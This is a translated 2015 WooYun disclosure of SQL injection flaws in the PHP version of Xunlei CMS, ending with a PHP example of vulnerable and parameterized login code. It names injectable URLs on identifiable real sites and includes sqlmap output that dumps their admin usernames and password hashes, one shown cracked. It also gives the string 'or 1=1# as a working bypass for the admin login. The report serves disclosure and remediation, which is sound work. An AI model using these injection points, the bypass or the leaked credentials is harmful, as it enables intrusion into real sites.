
Vulnerability summary

Defect ID: wooyun-2015-0103460

Title: Xunlei CMS, PHP version: two GET injections + a POST injection

Vendor: Xunlei CMS

Author: 浅蓝

Submitted: 2015-03-31 15:27

Fixed: 2015-05-15 15:28

Published: 2015-05-15 15:28

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-31: Actively contacting the vendor and waiting for the vendor to acknowledge the report; details not disclosed publicly
2015-05-15: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As stated in the title.

Detailed description:

Xunlei CMS featured cases:
http://ycxl.net/index.php?m=Article&a=index&id=22
http://www.ycgjgs.com/ (this one is the PHP version)
http://www.ycgjgs.com//news.php?id=475 injection point 1
http://www.ycgjgs.com//qynews.php?type=8 injection point 2

Database: gongjiaogongsi
Table: 285765338_message
[8 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| data   | text    |
| huifu  | text    |
| id     | int(11) |
| name   | text    |
| ok     | int(11) |
| tel    | text    |
| text   | text    |
| title  | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_news
[9 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| data     | text         |
| id       | int(11)      |
| ly       | text         |
| text     | text         |
| title    | text         |
| titlepic | varchar(100) |
| type     | text         |
| voidurl  | varchar(255) |
| zz       | text         |
+----------+--------------+
Database: gongjiaogongsi
Table: 285765338_dy
[5 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| id     | int(11) |
| text   | text    |
| title  | text    |
| type   | text    |
| typp   | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_zp
[13 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| gwyq   | text    |
| id     | int(11) |
| jzrq   | text    |
| lxfs   | text    |
| nl     | text    |
| rs     | text    |
| xb     | text    |
| xl     | text    |
| yx     | text    |
| zpzw   | text    |
| zwmc   | text    |
| zygl   | text    |
| zyyq   | text    |
+--------+---------+
Database: gongjiaogongsi
Table: 285765338_admin
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+
Database: gongjiaogongsi
Table: 285765338_info
[6 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| foot   | text    |
| id     | int(11) |
| query1 | text    |
| query2 | text    |
| title  | text    |
| url    | text    |
+--------+---------+

Database: gongjiaogongsi
Table: 285765338_admin
[3 entries]
+----------+--------------------------------------------+
| username | password                                   |
+----------+--------------------------------------------+
| admin    | 3578ff997a31c61033122d17322858bd           |
| admin1   | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
| admin2   | 72f4f10a40c4be8fbf63b79cbf21abca (admin99) |
+----------+--------------------------------------------+
[15:27:44] [WARNING] table 'gongjiaogongsi.`285765338_admin`' dumped to CSV file 'C:\Documents and Settings\Administrator\.sqlmap\output\www.ycgjgs.com\dump\gongjiaogongsi\285765338_admin-62da74f4.csv'
[15:27:44] [INFO] fetched data logged to text files under 'C:\Documents and Settings\Administrator\.sqlmap\output\www.ycgjgs.com'
[*] shutting down at 15:27:44




# The backend login does not filter its parameters, so the login can be bypassed
http://www.ycgjgs.com//admincm/ (backend)



Username: 'or 1=1#   Password: anything


Proof of vulnerability: same content as the detailed description above.


Fix recommendation:

Escape the input before it reaches the SQL query.
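The pattern the report describes and its parameterized fix, as an added example (not Xunlei CMS source code). Table and column names come from the sqlmap dump above; `$pdo` is an assumed, already-open PDO connection to the MySQL database, and storing `md5($pass)` in the vulnerable path is an assumption based on the 32-hex hashes in the dump.

```php
<?php
// Added example, not Xunlei CMS source. Table and column names come from the
// sqlmap dump in the report; $pdo is an assumed, already-open PDO connection
// to the MySQL database (PDO::ERRMODE_EXCEPTION assumed).

// Pattern consistent with the behaviour the report describes: the submitted
// username is concatenated into the query. With the username  'or 1=1#  the
// WHERE clause becomes  username=''or 1=1#' AND password='...'  and MySQL
// treats everything after # as a comment, so the password check never runs.
// (Storing md5($pass) is an assumption based on the 32-hex hashes in the dump.)
function loginVulnerable(PDO $pdo, string $user, string $pass): bool
{
    $sql = "SELECT id FROM `285765338_admin` WHERE username='$user' "
         . "AND password='" . md5($pass) . "'";
    return $pdo->query($sql)->fetch(PDO::FETCH_ASSOC) !== false;
}

// Hardened login: the SQL text is fixed and the username travels as a bound
// parameter, so quotes and # in the input are data, never syntax. The stored
// hash is checked in PHP with password_verify(), which assumes the table has
// been migrated from unsalted MD5 to password_hash() values.
function loginSafe(PDO $pdo, string $user, string $pass): bool
{
    $stmt = $pdo->prepare('SELECT password FROM `285765338_admin` WHERE username = ? LIMIT 1');
    $stmt->execute([$user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($pass, $row['password']);
}

// news.php?id= : accept only a plain integer and bind it, so nothing but a
// number ever reaches the query text.
function getNewsSafe(PDO $pdo, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT title, `text` FROM `285765338_news` WHERE id = ?');
    $stmt->execute([(int) $rawId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Usage sketch with constructed input: the report's bypass value on the safe path.
// loginSafe($pdo, "'or 1=1#", 'anything');
```

On the safe path the bypass value is looked up as a literal username `'or 1=1#`, no such row exists, and the function returns false without the query structure ever changing.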

Copyright notice: when reposting, please credit the source: 浅蓝@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively declined.